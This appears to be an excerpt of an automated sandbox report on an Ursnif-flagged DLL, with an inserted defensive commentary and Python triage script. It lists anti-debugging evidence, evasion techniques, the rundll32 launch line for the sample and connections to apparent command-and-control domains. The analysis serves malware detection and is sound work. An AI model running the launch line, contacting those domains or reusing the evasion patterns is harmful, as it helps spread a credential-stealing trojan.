Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4FAB9A push ecx; ret
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E4FAB9A push ecx; ret
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4C1DE5 LoadLibraryA,GetProcAddress,

                      Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 4668, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4712, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.70a31a.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.caa31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.810000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30794a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.70a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.rundll32.exe.6e4c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.45794a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.45794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.33ba31a.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.33ba31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.30da31a.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.caa31a.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.rundll32.exe.6e4c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.c70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.30da31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.64a31a.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.64a31a.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4c0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: WerFault.exe, 00000013.00000002.500670226.0000000004D40000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW8
                      Source: loaddll32.exe, 00000000.00000002.768580069.00000000010C7000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.700093416.0000000000894000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.500798053.0000000004D65000.00000004.00000001.sdmp, WerFault.exe, 00000014.00000002.503450551.00000000053B0000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000002.518255520.0000000005005000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                      Source: WerFault.exe, 00000014.00000002.503739309.000000000548E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWH
                      Source: rundll32.exe, 00000003.00000003.700067622.0000000000889000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
                      Source: loaddll32.exe, 00000000.00000002.769931525.000000000110E000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4C1DE5 LoadLibraryA,GetProcAddress,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E51C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E528861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E56DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E56DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E56DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E51C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E528861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E56DFDA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E56DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E56DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E51C325 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E528861 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E56DEAA mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E56E3B4 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E56DBB5 push dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E4FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6E4FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
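The anti-debugging rows above are raw evidence, not a verdict: `fs:[30h]` is the PEB, which malware reads for `BeingDebugged`/`NtGlobalFlag` checks but also simply to walk `PEB->Ldr` and resolve APIs, and the chain `IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter` is what the MSVC runtime's security-failure handler looks like in any statically linked CRT. The `Process queried: DebugPort` rows (an `NtQueryInformationProcess(ProcessDebugPort)` call, which is what `CheckRemoteDebuggerPresent` does underneath) are the stronger signal. The following triage script is an added example, not part of the Joe Sandbox report or of the sample: it parses rows shaped like the ones above, weights them accordingly, and checks that the function addresses fall inside the sample's image. The image base 0x6E4C0000 is taken from the report's unpack names (`4.2.rundll32.exe.6e4c0000.0.unpack`); the 1 MiB image size and the weights are this example's own assumptions, and the `EVIDENCE` rows are constructed.

```python
"""Triage anti-debugging evidence rows of the kind a sandbox report lists.

Added example; not code from the report or from the sample. EVIDENCE is
constructed to mirror the report's 'Code function' / 'Process queried'
rows. SAMPLE_IMAGE_BASE comes from the report's unpack names
(...6e4c0000...); SAMPLE_IMAGE_SIZE and the rule weights are ASSUMPTIONS.
"""
import re
from collections import Counter, defaultdict

SAMPLE_IMAGE_BASE = 0x6E4C0000
SAMPLE_IMAGE_SIZE = 0x100000  # ASSUMPTION: 1 MiB upper bound for the range check

EVIDENCE = [  # constructed rows modelled on the report
    r"Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E506CB3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,",
    r"Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4C1DE5 LoadLibraryA,GetProcAddress,",
    r"Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E51C325 mov eax, dword ptr fs:[00000030h]",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E56DBB5 push dword ptr fs:[00000030h]",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Process queried: DebugPort",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4FB316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,",
]

IMAGE = re.compile(r"Source:\s*(\S+?\.exe)")
CODE_FN = re.compile(r"Code function:\s*(\d+)_(\d+)_([0-9A-Fa-f]{8})\s*(.*)$")
QUERIED = re.compile(r"Process queried:\s*(\w+)")
PEB_READ = re.compile(r"fs:\[0*30h\]", re.IGNORECASE)


def tag_code_function(apis):
    """Map one API chain or instruction to (tag, weight) pairs."""
    tags = []
    crt_like = ("IsDebuggerPresent" in apis
                and "SetUnhandledExceptionFilter" in apis
                and "UnhandledExceptionFilter" in apis)
    if "IsDebuggerPresent" in apis:
        # Same chain as the CRT security-failure path: keep the tag, drop the weight.
        tags.append(("IsDebuggerPresent", 0 if crt_like else 2))
    if PEB_READ.search(apis):
        # PEB access: BeingDebugged/NtGlobalFlag check OR PEB->Ldr API resolution.
        tags.append(("PEB read (fs:[30h])", 1))
    if "GetProcAddress" in apis:
        tags.append(("dynamic API resolution", 1))
    return tags


def in_sample_image(addr):
    return SAMPLE_IMAGE_BASE <= addr < SAMPLE_IMAGE_BASE + SAMPLE_IMAGE_SIZE


def triage(lines):
    """Per image name: tag counts, a weighted score, and addresses outside the sample."""
    out = defaultdict(lambda: {"tags": Counter(), "score": 0,
                               "addresses": set(), "outside_image": set()})
    for line in lines:
        img = IMAGE.search(line)
        key = img.group(1).rsplit("\\", 1)[-1].lower() if img else "?"
        rec = out[key]
        m = CODE_FN.search(line)
        if m:
            _proc, _snapshot, addr_hex, apis = m.groups()
            addr = int(addr_hex, 16)
            rec["addresses"].add(addr)
            if not in_sample_image(addr):
                rec["outside_image"].add(addr)
            for name, weight in tag_code_function(apis):
                rec["tags"][name] += 1
                rec["score"] += weight
            continue
        q = QUERIED.search(line)
        if q and q.group(1) == "DebugPort":
            # NtQueryInformationProcess(ProcessDebugPort): explicit debugger check.
            rec["tags"]["ProcessDebugPort query"] += 1
            rec["score"] += 2
    return dict(out)


if __name__ == "__main__":
    for image, rec in triage(EVIDENCE).items():
        print(image, rec["score"], dict(rec["tags"]),
              [hex(a) for a in sorted(rec["outside_image"])])
```

Addresses that land outside the sample's image would point at code the sandbox attributed to a different module (or to injected memory) and deserve a closer look; here every address is inside the 0x6E4C0000 image, so the checks belong to the DLL itself.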

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.msn.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.219.162 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: areuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.97.161.50 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: breuranel.website
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.223.66 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 40.101.124.210 187
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: msn.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 52.97.137.114 187
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 13.82.28.61 187
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
Source: loaddll32.exe, 00000000.00000002.773341401.0000000001630000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.457889197.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776035012.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.470562084.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.460801376.00000000039C0000.00000002.00020000.sdmp | Binary or memory string: uProgram Manager
Source: loaddll32.exe, 00000000.00000002.773341401.0000000001630000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.457889197.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776035012.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.470562084.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.460801376.00000000039C0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.773341401.0000000001630000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.457889197.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776035012.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.470562084.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.460801376.00000000039C0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.773341401.0000000001630000.00000002.00020000.sdmp, rundll32.exe, 00000002.00000000.457889197.0000000003820000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.776035012.0000000002D90000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000000.470562084.0000000002D70000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000000.460801376.00000000039C0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\System32\loaddll32.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4C1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E51FF15 _free,_free,_free,GetTimeZoneInformation,_free,
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_6E4C1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, type: MEMORY
